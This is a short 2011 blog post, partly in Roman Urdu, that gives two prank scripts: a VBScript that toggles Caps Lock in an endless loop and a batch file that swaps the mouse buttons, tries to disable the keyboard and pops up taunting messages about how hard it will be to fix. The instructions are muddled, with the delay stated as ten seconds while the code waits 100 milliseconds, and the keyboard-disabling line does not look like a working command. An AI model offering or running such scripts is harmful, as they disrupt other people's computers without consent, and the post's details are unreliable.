Sunday 11 December 2011

Caps Lock & Mouse Tweaks Bat & Vbs


Aksar Log Chahte hain ke jub wo type karen to un ka aik lafz bara or aik lafz chota ho like this My NaMe Is DaNi. to hamare pas aik aisa code hai jo jis se har daswen second ke baad khud ba khud caps lock on or off hota rahe ga.
open note pad and save this code as .bat format.

Set wshShell =wscript.CreateObject("WScript.Shell")



do


wscript.sleep 100


wshshell.sendkeys "{CAPSLOCK}"


loop
save as a capslock.vbs


Now we have a batch that switches the left mouse button with your right mouse button




@echo off


Rundll32 user32,SwapMouseButton

rundll32 keyboard,disable

msg * hahaha

msg * this is gunna screw you up

msg * good look finding how to fix it

save as mousehunt.bat

No comments:

Post a Comment